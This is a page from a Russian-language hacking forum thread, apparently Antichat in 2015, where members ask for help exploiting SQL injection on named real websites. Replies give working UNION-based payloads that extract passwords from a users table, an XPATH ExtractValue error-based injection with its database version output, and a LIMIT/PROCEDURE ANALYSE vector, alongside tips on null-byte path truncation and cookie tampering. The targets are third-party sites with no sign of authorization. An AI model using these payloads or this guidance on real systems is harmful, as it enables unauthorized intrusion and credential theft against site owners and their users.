Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    не очень удобно раскручивать скулю в куках через браузер. поставь burp suite, или charles.
    а так можно через Live http headers для ФФ
     
    _________________________
  2. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    ну перехвати один из запросов, потом повторно отправляй его меняя куки

    попробуй нулл-байтом отрезать .php, или же юзать багу со слеш-дотами. ничего нового.
     
    _________________________
  3. profishell

    profishell Member

    Joined:
    21 Feb 2014
    Messages:
    32
    Likes Received:
    14
    Reputations:
    7
    Про слеши - https://rdot.org/forum/archive/index.php/t-2611.html

    А по скуле... Че тут крутить?

    http://storeshop.hol.es/gpay?note=b... 1,2,3,4,5,6,7,version(),9,10,11,12,13,14-- '
     
    SaNDER likes this.
  4. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    пробуйте добавлять параметры типа юзер-агентов, кук, делать меньше delay и т. д.
     
    _________________________
  5. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    http://storeshop.hol.es/admin
    http://storeshop.hol.es/gpay?note=b...10,password,12,13,14+from+users+limit+0,1+--+'
    пароль не выкладываю, т.к нельзя. Есть на cmd5.

    Вам и так все расжували уже, пробуйте ручками все делать, а не хевиджем со скулмапом.
     
    SaNDER likes this.
  6. ButilkaSoka

    ButilkaSoka Member

    Joined:
    4 Jun 2015
    Messages:
    22
    Likes Received:
    12
    Reputations:
    0
    Хелп.
    Нужна помощь в раскрутке.
    Code:
    http://tao.kg/?p=search&search=dota+2&Provider=Taobao&SearchMethod=Extended&cid=-1%27
    
    http://dota2.name/request/edit/?act=skype&id=\
    POST
    name=skype&pk=1&value=e
    
    Как двигаться дальше через ошибки вида:
    Code:
    /page.php
    site.com/page/
    
    Например:
    Code:
    http://kasko-center.by/kasko.courses.php
    http://www.24tv.by/24old/
    
    Есть ли тут sqli?
    Code:
    http://steam-store.ru/pay
    POST
    price=3
     
  7. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25

    [​IMG]

    http://kasko-center.by/kasko.courses.php
    http://www.24tv.by/24old/
    Просто ошибки сайта (раскрытие путей), ничего не делать, искать другие уязвимости.
     
    #607 Br@!ns, 28 Sep 2015
    Last edited: 28 Sep 2015
    ButilkaSoka likes this.
  8. 3ran

    3ran Member

    Joined:
    27 Jul 2012
    Messages:
    39
    Likes Received:
    19
    Reputations:
    5
    Лол :D
    Нашел phpinfo и решил взломать хостинг,фантазер однако :D
     
  9. 3ran

    3ran Member

    Joined:
    27 Jul 2012
    Messages:
    39
    Likes Received:
    19
    Reputations:
    5
    Ну смотри,ты кое-как нарыл инфу по версиям ПО,теперь проверь есть ли на них уязвимости,сплоиты.
    Но это тебе не особо поможет.
     
    SaNDER likes this.
  10. ocheretko

    ocheretko Banned

    Joined:
    15 May 2010
    Messages:
    144
    Likes Received:
    51
    Reputations:
    116
    Invalid multibyte
    говорит о том, что данные получены не в UTF-8, как ожидала функция, а хз в какой. Этот прием полезен чтобы получить раскрытие путей, что у Вас и получилось

    Если идти последовательно, то сперва всегда идет сбор данных, а после проверка гипотез
     
    SaNDER likes this.
  11. RedFern.89

    RedFern.89 Member

    Joined:
    20 Jan 2010
    Messages:
    575
    Likes Received:
    48
    Reputations:
    0
    Code:
    http://www.game-debate.com/benchmark/bm_datatable.php?bRegex=false&bRegex_0=false&bRegex_1=false&bRegex_10=false&bRegex_11=false&bRegex_2=false&bRegex_3=false&bRegex_4=false&bRegex_5=false&bRegex_6=false&bRegex_7=false&bRegex_8=false&bRegex_9=false&bSearchable_0=true&bSearchable_1=true&bSearchable_10=true&bSearchable_11=true&bSearchable_2=true&bSearchable_3=true&bSearchable_4=true&bSearchable_5=true&bSearchable_6=true&bSearchable_7=true&bSearchable_8=true&bSearchable_9=true&bSortable_0=true&bSortable_1=true&bSortable_10=true&bSortable_11=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&bSortable_7=true&bSortable_8=true&bSortable_9=true&iColumns=12&iDisplayLength=1%27%22&iDisplayStart=0&iSortCol_0=1&iSortingCols=1&mDataProp_0=rbt_tool&mDataProp_1=rb_bench&mDataProp_10=m_graf&mDataProp_11=rbt_test&mDataProp_2=m_cpu_deriv&mDataProp_3=m_graf_deriv&mDataProp_4=rbt_types&mDataProp_5=m_username&mDataProp_6=rb_date&mDataProp_7=rb_id&mDataProp_8=m_id&mDataProp_9=m_cpu&sColumns=&sEcho=3&sSearch=&sSearch_0=&sSearch_1=&sSearch_10=&sSearch_11=&sSearch_2=&sSearch_3=&sSearch_4=&sSearch_5=&sSearch_6=&sSearch_7=&sSearch_8=&sSearch_9=&sSortDir_0=asc&_=1443468868286
    
    Возможно ли раскрутить?
     
  12. cheebeez

    cheebeez Member

    Joined:
    28 Feb 2010
    Messages:
    34
    Likes Received:
    43
    Reputations:
    1
    [DEL 32]
     
    #612 cheebeez, 30 Sep 2015
    Last edited: 25 Apr 2016
  13. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    829
    Likes Received:
    815
    Reputations:
    90
    куки куки, сессию подключения вероятно нужно передавать



    юзай curl, в firefox(firebug) к тому же можно скопировать запрос в формате curl
     
    _________________________
  14. ButilkaSoka

    ButilkaSoka Member

    Joined:
    4 Jun 2015
    Messages:
    22
    Likes Received:
    12
    Reputations:
    0
    В Acunetix есть HTTP Editor, там будет id_goods=1, через XPATH
    Code:
    csrf_ytse_token=01cc4a2e39c048f58f725bfe26e5d57c&failpage=http://steamplay.ru
    /&goods_title=BRILLIANT%20STEAM%20%d0%ba%d0%bb%d1%8e%d1%87%20%2b%5b
    %20CS%20GO%20Arma%20DAYZ%20GTA%20%5d%2b%20%d0%9f%d0%9e%d0%94%d0%90
    %d0%a0%d0%9a%d0%98&id_agent=390191&id_goods=1'or(ExtractValue(0x3a,concat(0x3a,(select version()))))='&price=15&thumbnail=1910800.jpg&token=27091&type_curr=WMR
    XPATH syntax error: ':5.6.26-74.0-beget-log'
     
    SaNDER and ocheretko like this.
  15. cheebeez

    cheebeez Member

    Joined:
    28 Feb 2010
    Messages:
    34
    Likes Received:
    43
    Reputations:
    1
    [DEL 33]
     
    #615 cheebeez, 30 Sep 2015
    Last edited: 25 Apr 2016
    SaNDER likes this.
  16. RedFern.89

    RedFern.89 Member

    Joined:
    20 Jan 2010
    Messages:
    575
    Likes Received:
    48
    Reputations:
    0
    Возможно ли раскрутить?

    Code:
    http://prodota.ru/news/?p=\
     
  17. ghost8

    ghost8 Member

    Joined:
    29 May 2015
    Messages:
    110
    Likes Received:
    20
    Reputations:
    0
    возможно,каков вопрос-такой ответ
    Дельный совет чуваки,сначало пробуйте методом проб и ошибок,потом задавайте вопрос,это для вас же будет лучше,больше поймте
     
  18. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Вероятно инъекция в LIMIT. Попробуйте применить соответствующий вектор:
    Code:
    PROCEDURE ANALYSE (0, (SELECT 3 ORDER BY updatexml(1, concat(0x3A, version()), 1)))
    
    https://rdot.org/forum/showthread.php?t=60&page=3

    Функционал, преобразующий номер страницы в числа LIMIT-ов, никогда не был и не будет уязвим к атакам типа SQLi. Если вы видете в ответе что-то вроде этого:

    Code:
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20, 20'
    
    Смело считайте, что там ничего нет. Эти инъекции стабильно появляются у нас в теме раз в неделю.
     
  19. cheebeez

    cheebeez Member

    Joined:
    28 Feb 2010
    Messages:
    34
    Likes Received:
    43
    Reputations:
    1
    [DEL 35]
     
    #619 cheebeez, 1 Oct 2015
    Last edited: 25 Apr 2016
  20. Sice54

    Sice54 New Member

    Joined:
    1 Oct 2015
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Доброго времени суток друзья, пытаюсь найти что-то интересно и вывести ошибки на сайте.

    Подставляю кавычку в параметр page, он отображает эту ковычку с обратным слешем.
    ventilyatory-c-904_26.html?page=2'&filter_id=287

    На определенных страницах, пишет "Интернет-магазин закрыт на техническое обслуживание, заходите позже!"

    ventilyatory-c-904_26.html?ppp=50'

    Подскажите пожалуйста, можно как-нибудь вывести ошибку в итоге ? И что это за случай ?
    Заранее спасибо.
     
    #620 Sice54, 1 Oct 2015
    Last edited: 2 Oct 2015